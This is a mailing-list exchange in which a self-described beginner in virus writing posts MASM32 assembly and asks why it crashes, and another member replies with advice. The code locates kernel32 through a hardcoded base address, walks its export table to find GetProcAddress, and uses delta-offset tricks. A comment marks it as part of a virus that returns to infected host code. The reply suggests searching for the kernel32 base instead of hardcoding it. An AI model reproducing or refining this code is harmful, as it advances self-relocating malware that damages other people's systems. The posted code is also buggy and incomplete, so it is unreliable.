Hai,

I did not go through the detail of your code (busy on study
now)...anyhow..just my opinion, refer to the following code:

XPKernel32BaseAddress equ 77E60000h

as i know..you tried to fix the kernel32 base address...this may
cause the exception when the code not successful to look for the
right address..

try add another routine search for kernel32.dll base address
random..refer to my article the technic checksum...

cheer...

and nice code !!

i will study again your code and get back tto you :)

--- In F-13Labs@yahoogroups.com, "sandundhammikaperera"
<sandundhammikaperera@...> wrote:
>
> man I read the articles and find out the ways to get the kernel32
> base address on the hardcorded method and I done some
GetProcAddress
> search . But the problem in this is I got an exception . why was
> that ?
> my code is this .
> First I write the code but the variables in the code segment are
> read only thus I changet that segment attributes and try again
> already then in I debugging on the ollydebug it faills when it
scans
> the 2Dh element of the export table of the Kernel32.dll what a
fuck
> is this ? Please help me man please ... Please ... I'm very
curious
> now . I just cant breath without assembly now . Please man help me
> give me some drugs .
>
>
> This is my source code .
> ------------------------------------------------code begins ------
>
> .586
> .model flat , stdcall
> option casemap : none
> include c:\masm32\include\kernel32.inc
> includelib c:\masm32\lib\kernel32.lib
> include c:\masm32\include\user32.inc
> includelib c:\masm32\lib\user32.lib
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> .code
> start:
> call GetDelta
> GetDelta:
> pop ebp
> sub ebp , OFFSET GetDelta - OFFSET start
> XPKernel32BaseAddress equ 77E60000h
> mov eax , XPKernel32BaseAddress
> call CheckForK32
> cmp eax , 0000000h
> jne ExitLoop
> mov eax , XPKernel32BaseAddress
> call GetApiAddress
> ;; now we are going to print a messageBox
> invoke ExitProcess , 0
>
>
>
>
>
> ExitLoop:
> ;; return to the host code in our virus .
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> CheckForK32 proc
> cmp word ptr [ eax ] , 'ZM'
> jne NotFound
> add eax , 3ch
> mov eax , [eax]
> add eax , XPKernel32BaseAddress
> cmp word ptr [ eax ] , 'EP'
> jne NotFound
> xor eax , eax
> ret
> NotFound:
> ;; die
> CheckForK32 endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
>
>
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
> aPEHelder dd 0
> aimportDir dd 0
> aAddressTable dd 0
> aNameTable dd 0
> aOrdinalTable dd 0
> nOfExports dd 0
> sGetProcAddress db 'GetProcAddress' ,0
> aGetProcAddress dd 0
>
> GetApiAddress proc
> ;; oky now we have to get the PE real address
> mov eax , [eax+3ch]
> mov [ebp + (OFFSET aPEHelder - OFFSET start) ] , eax
> add eax , XPKernel32BaseAddress
> mov [ebp+( OFFSET aPEHelder- OFFSET start) ] , eax
> ;; now there is PE helder address in the eax
> ;; we shall play with it .
> ;; Then we need is the place where VA of import dir is kept
> ;; it is on the 78h
> add eax , 78h
> mov eax,dword ptr [ eax ]
> add eax , XPKernel32BaseAddress
> push eax
> mov [ebp + (OFFSET aimportDir- OFFSET start) ] , eax
> ;;oky we are pointed to the import table in eax
> ;; oky then get the addresstableRVA
> add eax , 1ch
> mov eax , [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ebp + (OFFSET aAddressTable-OFFSET start)] , eax
> pop eax
> ;; oky now we shoud have the Name PTR table
> push eax
> add eax , 20h
> mov eax , dword ptr [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ebp + (OFFSET aNameTable - OFFSET start) ] , eax
> pop eax
> push eax
> ;;Now we should get the Ordinal table
> add eax , 24h
> mov eax , dword ptr [eax]
> add eax , XPKernel32BaseAddress
> mov dword ptr [ ebp+ ( OFFSET aOrdinalTable - OFFSET start)] ,
> eax
> pop eax
> push eax
> ;; now we have to get nunber of exports
> add eax , 18h
> mov eax , dword ptr [eax]
> mov dword ptr [ebp + (OFFSET nOfExports- OFFSET start) ] , eax
> mov ecx , eax
> pop eax
>
> ;; Now we have to search for the APIs , Lets go
> ;; we shoud put the nOfExports to the ecx oky
> ;; virus leavaman sanaseama laba! .
> mov eax , dword ptr [ ebp + (OFFSET aNameTable - OFFSET start)]
> ;; now the eax is pointed to the first address of the string
> name
> mov edx , 0
> lea esi , [ebp +(OFFSET sGetProcAddress- OFFSET start)]
> mov ebx , esi
> CheckNext:
> push edx
> shl edx , 2
> add eax , edx
> pop edx
> mov edi , dword ptr [ eax ]
> add edi , XPKernel32BaseAddress
> inc edx
> mov esi , ebx
> CheckByte:
> ;; we have to compare the bytes in EDI with ESI
> cmpsb
> jne CheckNext
> cmp byte ptr [esi] , 0
> je GotIt
> cmp edx , ecx
> je ExitLoop ;; what a shitt this is not kernel32 what
a
> fuck .
> jmp CheckByte
> GotIt:
> ;; oky we now get that shitt . Oky now we have to store this
> shitt
> ;; its on the count of edx +1
> ;; but in the loop it was already incremented .This is where
> aAddressTable was need
> mov eax , [ebp + (OFFSET aAddressTable - OFFSET start) ]
> mov eax , [eax]
> push edx
> shl edx , 2
> add eax , edx
> pop edx
> mov eax , [eax]
> mov [ebp + (OFFSET aGetProcAddress-OFFSET start) ] , eax
> xor eax , eax
> xor edx , edx
> ret
> GetApiAddress endp
> ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;
;;
> ;;;
> end start
>
> -------------------------------------------------------------------
-
> please make sure to changet the attributes on the segments to full
> access in order to avoid memory access violations under ollydbg.
>
>
> oky man please help me man . I just a beaganner to the assembly
> langaueg and virus writing . I need to go to the hell .
> by : sanzilla jackcat
>
> sandundhammikaperera@...
>